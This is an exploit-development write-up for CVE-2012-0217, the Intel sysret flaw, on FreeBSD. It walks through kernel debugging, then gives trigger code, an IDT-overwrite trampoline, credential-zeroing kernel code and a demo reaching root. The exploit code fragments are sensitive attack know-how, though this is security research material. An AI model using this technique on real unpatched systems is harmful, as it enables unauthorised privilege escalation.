CVE-2012-0217: Intel's sysret Kernel Privilege Escalation (on FreeBSD)

By iZsh


CVE-2012-0217 was reported by Rafal Wojtczuk, but, ironically, the same issue had already been fixed in Linux in 2006 (CVE-2006-0744) without receiving much attention.

It is quite an interesting vulnerability in many respects. Among other things, because of its hardware basis, it impacts many operating systems: as long as they run on an Intel processor in long mode (obviously), FreeBSD, NetBSD, Solaris, Xen and Microsoft Windows have been reported to be vulnerable. That gives us quite an incentive to develop an exploit ;).

If you haven't yet read Xen's blog post "The Intel SYSRET privilege escalation", please do, because we won't go into much detail about the vulnerability itself.

Without further delay, let’s dig right into the FreeBSD exploitation!

Overview

While developing an exploit, it helps to keep a mental (or written) TODO list or roadmap toward a successful exploitation. Here is one, in the chronological order of the exploitation:

A way to debug the kernel! (You really think one shot is all it takes? ;) )

Information gathering

Code to trigger the vulnerability

Getting arbitrary code execution

Keeping the kernel stable

Recovering from the general protection fault exception (#GP)

Privilege escalation

Giving back a shellcode to the user

(3) Profit ;)

Of course, this is not necessarily the order in which you come up with ideas to solve them. You don't always (often?) have a full roadmap until random ideas slowly gather, start to make sense and flow together.

Kernel debugging

This is one of the most important items. Having a good debugging environment goes a long way toward a successful exploitation.

Many configurations could work; in this case, we run and debug the target OS (FreeBSD) under VMware Fusion on Mac OS X.

Indeed, VMware provides an easy way to debug the guest OS through a debug stub. Enabling it is easy: edit the .vmx file found inside your VMware VM bundle (Right Click->Show Package Contents) and add the following line:

debugStub.listen.guest64 = "TRUE"

With this magic configuration line, VMware listens on port 8864, and you can now debug your VM's OS using gdb's target command:

(gdb) target remote localhost:8864

To be useful, though, gdb needs to be configured and cross-compiled for the FreeBSD target (amd64-marcel-freebsd) so that it can load the FreeBSD kernel symbols. This requires gettext, gmp and libelf, which you can install with MacPorts.

As an example, using gdb 7.4.1:

% sudo port install gettext gmp libelf
[...]
% curl -O http://ftp.gnu.org/gnu/gdb/gdb-7.4.1.tar.bz2
[...]
% tar xvjf gdb-7.4.1.tar.bz2
[...]
% cd gdb-7.4.1
gdb-7.4.1 % CFLAGS=-I/opt/local/include ./configure --prefix=/opt/local --program-suffix=-amd64-marcel-freebsd --target=amd64-marcel-freebsd
[...]
gdb-7.4.1 % make
[...]
gdb-7.4.1 % make install

Finally, copy FreeBSD's /usr/src and /boot/kernel/ directories over to Mac OS X.

And voila, you’re set!

% ls
kernel/ usr/
% gdb-amd64-marcel-freebsd -q -tui kernel/kernel

[TUI register window, group: general]
rax  0x0                 0
rbx  0x0                 0
rcx  0x100b              4107
rdx  0x1008              4104
rsi  0xffffff80001f6b54  -549753754796
rdi  0x1008              4104
rbp  0xffffff80001f6b30  0xffffff80001f6b30
rsp  0xffffff80001f6b30  0xffffff80001f6b30
r8   0x0                 0
r9   0x0                 0
r10  0x2                 2
r11  0xffffffff8022fdb0  -2145190480
r12  0xffffff0002286200  -1099475426816
r13  0xffffff0002286228  -1099475426776

[TUI source window: /usr/src/sys/amd64/acpica/acpi_machdep.c]
 96  {
 97          return (0);
 98  }
 99
100  void
101  acpi_cpu_c1()
102  {
103          __asm __volatile("sti; hlt");
>104 }
105
106  /*
107   * Support for mapping ACPI tables during early boot. Curr
108   * uses the crashdump map to map each table. However, the
109   * map is created in pmap_bootstrap() right after the direc

remote Thread 1 In: acpi_cpu_c1    Line: 104    PC: 0xffffffff8092d1d6
Reading symbols from kernel/kernel...done.
(gdb) target remote localhost:8864
Remote debugging using localhost:8864
acpi_cpu_c1 () at /usr/src/sys/amd64/acpica/acpi_machdep.c:104
(gdb)

NB: you can change the -tui layout by pressing ctrl+x 2 multiple times.

One warning, though: you can't easily single-step through the syscall path. For instance, if you single-step through the function Xfast_syscall [1], the code

    cli
    testl   $PCB_FULL_IRET,PCB_FLAGS(%rax)

would detect it needs a full iret and won’t use the sysret instruction.

The trick is therefore to set your breakpoints directly on the #GP and double fault handlers (respectively Xprot() [2] and Xdblfault() [3]), which are triggered right after the sysret instruction executes. From there, you won't have trouble single-stepping, and you'll even see the page fault trigger once the kernel tries to access gs-relative data (we'll see why soon enough).

Information gathering

The exploit needs a few kernel symbol addresses. Under FreeBSD we're in luck: the kldsym() system call provides an easy way to look up symbols, as shown by the following get_symaddr() function.

#include <sys/param.h>
#include <sys/linker.h>   /* kldsym(), KLDSYM_LOOKUP, struct kld_sym_lookup */
#include <stdio.h>
#include <stdlib.h>

u_long
get_symaddr(char *symname)
{
    struct kld_sym_lookup ksym;

    ksym.version = sizeof(ksym);
    ksym.symname = symname;
    if (kldsym(0, KLDSYM_LOOKUP, &ksym) < 0) {
        perror("kldsym");
        exit(1);
    }
    printf("    [+] Resolved %s to %#lx\n", ksym.symname, ksym.symvalue);
    return ksym.symvalue;
}

Vulnerability Triggering

Triggering the vulnerability is easy:

Allocate a page just before the non-canonical address boundary 0x0000800000000000

Call an arbitrary syscall using a syscall instruction placed so that it ends right at the non-canonical address boundary

When the fast syscall handler (Xfast_syscall [1]) restores the user's registers and executes sysret, it tries to return to the "next instruction" at the non-canonical address 0x0000800000000000. On Intel processors, the resulting #GP is raised while still in kernel mode. Moreover, since rsp has already been restored to its user value, the exception frame is pushed onto what is now the user's stack. Thus, we can make the kernel write to a location we control!

Hence, the following trigger code:

uint64_t pagesize = getpagesize();
uint8_t *area = (uint8_t *)((1ULL << 47) - pagesize);

area = mmap(area, pagesize, PROT_READ | PROT_WRITE | PROT_EXEC,
            MAP_FIXED | MAP_ANON | MAP_PRIVATE, -1, 0);
if (area == MAP_FAILED) {
    perror("mmap (trigger)");
    exit(1);
}

// Copy the trigger code at the end of the page
// such that the syscall instruction is at its
// boundary
#define TRIGGERCODESIZE 20  // 5 + 3 + 10 + 2 bytes, without the string's NUL
char triggercode[] =
    "\xb8\x18\x00\x00\x00"                      // mov eax, 24 (zero-extended into rax); #getuid
    "\x48\x89\xe3"                              // mov rbx, rsp; save the user's stack for later
    "\x48\xbc\xbe\xba\xfe\xca\xde\xc0\xad\xde"  // mov rsp, 0xdeadc0decafebabe (placeholder, patched later)
    "\x0f\x05";                                 // syscall
uint8_t *trigger_addr = area + pagesize - TRIGGERCODESIZE;
memcpy(trigger_addr, triggercode, TRIGGERCODESIZE);

The question now is, what do we set rsp to?

Follow the white rabbit…

Arbitrary code execution

Depending on the target rsp, there are two outcomes:

if rsp can't be written to, a double fault is triggered (Xdblfault() [3]) and the exception frame is pushed to a special stack

otherwise, a #GP is triggered (Xprot() [2]) and the exception frame is pushed to [rsp]

In the latter case, the trouble is (or is it?)… that the #GP handler itself triggers a page fault (Xpage() [4]). Let's see why.

IDTVEC(prot)
    subq    $TF_ERR,%rsp
    movl    $T_PROTFLT,TF_TRAPNO(%rsp)                                 [1]
    movq    $0,TF_ADDR(%rsp)                                           [2]
    movq    %rdi,TF_RDI(%rsp)   /* free up a GP register */            [3]
    leaq    doreti_iret(%rip),%rdi
    cmpq    %rdi,TF_RIP(%rsp)
    je      1f                  /* kernel but with user gs base !! */
    testb   $SEL_RPL_MASK,TF_CS(%rsp)   /* Did we come from kernel? */ [4]
    jz      2f                  /* already running with kernel GS.base */
1:  swapgs
2:  movq    PCPU(CURPCB),%rdi                                          [5]

The test at [4] sets the Z flag because the fault comes from the kernel (the #GP is raised while sysret is still executing in ring 0), so the swapgs instruction is skipped. But in this particular chain of events, GS.base is in fact the user's GS.base! Indeed, it was restored just before sysret was executed… Hence, the gs-relative access at [5] triggers a page fault (Xpage() [4]).

If we don't do anything, we'll eventually double fault, triple fault, etc. and crash miserably.

We therefore need a way:

to recover from the #GP

to clean up any mess we made/overwrote

Both could be solved if we get arbitrary code execution by the time we reach [5]. (NB: this is not mandatory; we could get code execution later down the fault chain.)

So… here is the idea: wouldn’t it be nice if we could overwrite the page fault handler’s address and therefore get code execution when [5] triggers the #PF?

Yes indeed, and that’s how we’re going to exploit it :-)

First, a few structures for reference:

Gate descriptor:
+0:  Target Offset[15:0]   | Target Selector
+4:  Some stuff            | Target Offset[31:16]
+8:  Target Offset[63:32]
+12: Some more stuff

and from include/frame.h:

struct trapframe {
    register_t  tf_rdi;
    register_t  tf_rsi;
    register_t  tf_rdx;
    register_t  tf_rcx;
    register_t  tf_r8;
    register_t  tf_r9;
    register_t  tf_rax;
    register_t  tf_rbx;
    register_t  tf_rbp;
    register_t  tf_r10;
    register_t  tf_r11;
    register_t  tf_r12;
    register_t  tf_r13;
    register_t  tf_r14;
    register_t  tf_r15;
    uint32_t    tf_trapno;
    uint16_t    tf_fs;
    uint16_t    tf_gs;
    register_t  tf_addr;
    uint32_t    tf_flags;
    uint16_t    tf_es;
    uint16_t    tf_ds;
    /* below portion defined in hardware */
    register_t  tf_err;
    register_t  tf_rip;
    register_t  tf_cs;
    register_t  tf_rflags;
    register_t  tf_rsp;
    register_t  tf_ss;
};

When the exception is triggered, the hardware pushes, in that order, ss, rsp, rflags, cs, rip and err (the error code).

We can see that [1], [2] and [3] write to the stack.

[3] is fully user-controlled through rdi, so we could try to position rsp such that [3] overwrites the #PF handler's offset. The trouble is… rsp is automatically 16-byte aligned when an exception is triggered, and tf_rdi sits at a 16-byte-aligned offset within the trapframe, so [3] can only ever overwrite the first 8 bytes of a gate descriptor. We can therefore only overwrite the 32 least significant bits of the offset address.

[2] writes 0 to tf_addr, which is also 16-byte aligned. So no dice.

That leaves us with [1], which writes T_PROTFLT (0x9) to tf_trapno, and tf_trapno sits at a 16-byte-aligned offset + 8! This enables us to set Target Offset[63:32] to 0x9.

Thus, if we set rsp to &idt[14] + 10*8 (i.e. &idt[19], which aligns tf_trapno with the #PF gate's Target Offset[63:32]), the #PF handler's address becomes 0x9WWXXYYZZ, where WWXXYYZZ are the low 32 bits of the original handler address.

Furthermore, WWXXYYZZ is known, since we can get the #PF handler's address through get_symaddr(). To get arbitrary code execution, the idea is therefore to set up trampoline code at 0x9WWXXYYZZ (a user-space address we can map), which performs some setup and jumps to our kernel-mode payload (pointed to by rax in the following code).

*(uint64_t *)(trigger_addr + 10) = (uint64_t)(((uint8_t *)&sidt()[14]) + 10 * 8);

char trampolinecode[] =
    "\x0f\x01\xf8"                              // swapgs; switch back to the kernel's GS.base
    "\x48\x89\xdc"                              // mov rsp, rbx; restore rsp, it's enough to use the user's stack
    "\x48\xb8\xbe\xba\xfe\xca\xde\xc0\xad\xde"  // mov rax, 0xdeadc0decafebabe
    "\xff\xe0";                                 // jmp rax

uint8_t *trampoline = (uint8_t *)(0x900000000 | (Xpage_ptr & 0xFFFFFFFF));
size_t trampoline_allocsize = pagesize;

// We round the address to the PAGESIZE for the allocation
// Not enough space for the trampoline code ?
if ((uint8_t *)((uint64_t)trampoline & ~(pagesize - 1)) + pagesize < trampoline + TRAMPOLINECODESIZE)
    trampoline_allocsize += pagesize;
if (mmap((void *)((uint64_t)trampoline & ~(pagesize - 1)), trampoline_allocsize,
         PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_ANON | MAP_PRIVATE,
         -1, 0) == MAP_FAILED) {
    perror("mmap (trampoline)");
    exit(1);
}
memcpy(trampoline, trampolinecode, TRAMPOLINECODESIZE);
*(uint64_t *)(trampoline + 8) = (uint64_t)kernelmodepayload;

Keeping the kernel stable

Getting a root shell only to crash a microsecond later is no fun, is it? We'd better restore whatever we overwrote in kernel space while achieving code execution…

Let's summarize what we smashed with rsp initialized to &idt[14] + 10*8, i.e. &idt[19]:

The #GP exception frame writes 6 64-bit registers, i.e. it overwrites idt[18], idt[17] and idt[16]

tf_addr overwrites the low 64 bits (first 8 bytes) of idt[15]

tf_trapno overwrites the Target Offset[63:32] field of idt[14]

rdi (stored in tf_rdi) overwrites the low 64 bits of idt[7]

The #PF exception frame overwrites idt[6], idt[5] and idt[4]

Thus, overall, IDT entries 4, 5, 6, 7, 14, 15, 16, 17 and 18 need to be restored, and we should be safe.

struct gate_descriptor *idt = sidt();

setidt(idt, IDT_OF, Xofl_ptr,   SDT_SYSIGT, SEL_KPL, 0);  // 4
setidt(idt, IDT_BR, Xbnd_ptr,   SDT_SYSIGT, SEL_KPL, 0);  // 5
setidt(idt, IDT_UD, Xill_ptr,   SDT_SYSIGT, SEL_KPL, 0);  // 6
setidt(idt, IDT_NM, Xdna_ptr,   SDT_SYSIGT, SEL_KPL, 0);  // 7
setidt(idt, IDT_PF, Xpage_ptr,  SDT_SYSIGT, SEL_KPL, 0);  // 14
setidt(idt, IDT_MF, Xfpu_ptr,   SDT_SYSIGT, SEL_KPL, 0);  // 16
setidt(idt, IDT_AC, Xalign_ptr, SDT_SYSIGT, SEL_KPL, 0);  // 17
setidt(idt, IDT_MC, Xmchk_ptr,  SDT_SYSIGT, SEL_KPL, 0);  // 18
setidt(idt, IDT_XF, Xxmm_ptr,   SDT_SYSIGT, SEL_KPL, 0);  // 19
// NB: vector 15 is reserved by Intel and never raised by the CPU, so it is
// not restored here; IDT_XF (19) was not overwritten, so rewriting it is harmless.

Privilege escalation

This part is quite standard and easy: we just need to retrieve the address of the current process's credentials struct and set the various IDs to 0 (root).

Knowing that the current thread struct's address can be read from gs:0 under FreeBSD, we end up with the following code.

struct thread *td;
struct ucred *cred;

// get the thread pointer
asm ("mov %%gs:0, %0" : "=r"(td));

// The Dark Knight Rises
cred = td->td_proc->p_ucred;
cred->cr_uid = cred->cr_ruid = cred->cr_rgid = 0;
cred->cr_groups[0] = 0;

Shellcode

Finally… we return to our userland shellcode using the sysret instruction, with the shellcode's address in rcx.

// return to user mode to spawn the shell
asm ("swapgs; sysretq;" :: "c"(shellcode));  // store the shellcode addr to rcx

And the shellcode? What shellcode? :P

The credentials struct (struct ucred) is reference-counted and shared: a forked child keeps pointing to its parent's struct. Since we modified it in place, the caller's shell automagically inherits this privilege escalation.

Hence the following shellcode ;-)

void
shellcode()
{
    // Actually we don't really need to spawn a shell since we
    // changed our whole cred struct.
    // Just exit...
    printf("[*] Got root!\n");
    exit(0);
}

Demo

$ uname -a
FreeBSD FreeBSD 9.0 64bit 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64
$ id
uid=1001(qwerty) gid=1001(qwerty) groups=1001(qwerty)
$ ls -l
total 24
-rwxr-xr-x  1 qwerty  qwerty  11693 Jul  5 17:49 CVE-2012-0217
-rw-r--r--  1 qwerty  qwerty  10763 Jul  5 17:49 CVE-2012-0217.c
$ ./CVE-2012-0217
CVE-2012-0217 Intel sysret exploit -- iZsh (izsh at fail0verflow.com)

[*] Retrieving host information...
    [+] CPU: GenuineIntel
    [+] sysname: FreeBSD
    [+] release: 9.0-RELEASE
    [+] version: FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC
    [+] machine: amd64
[*] Validating target OS and version...
    [+] Vulnerable :-)
[*] Resolving kernel addresses...
    [+] Resolved Xofl to 0xffffffff80b02e70
    [+] Resolved Xbnd to 0xffffffff80b02ea0
    [+] Resolved Xill to 0xffffffff80b02ed0
    [+] Resolved Xdna to 0xffffffff80b02f00
    [+] Resolved Xpage to 0xffffffff80b03240
    [+] Resolved Xfpu to 0xffffffff80b02fc0
    [+] Resolved Xalign to 0xffffffff80b03080
    [+] Resolved Xmchk to 0xffffffff80b02f60
    [+] Resolved Xxmm to 0xffffffff80b02ff0
[*] Setup...
    [+] Trigger code...
    [+] Trampoline code...
[*] Fire in the hole!
[*] Got root!
$ id
uid=0(root) gid=0(wheel) groups=0(wheel)

Final words

The final exploit is quite stable, recovers nicely and exits back to the user's shell. It works as-is on both FreeBSD 8 and 9 (and probably 7) with the stock kernels, without any need for magic hardcoded values; but of course the environment could be hardened.

To conclude: the mandatory video :-)

And… That’s a wrap!

Hope you enjoyed it. Feel free to comment or discuss other exploitation paths.

[1] Xfast_syscall is defined in sys/amd64/amd64/exception.S

[2] Xprot is defined in sys/amd64/amd64/exception.S

[3] Xdblfault is defined in sys/amd64/amd64/exception.S

[4] Xpage is defined in sys/amd64/amd64/exception.S

The full weaponized exploit is also available on GitHub.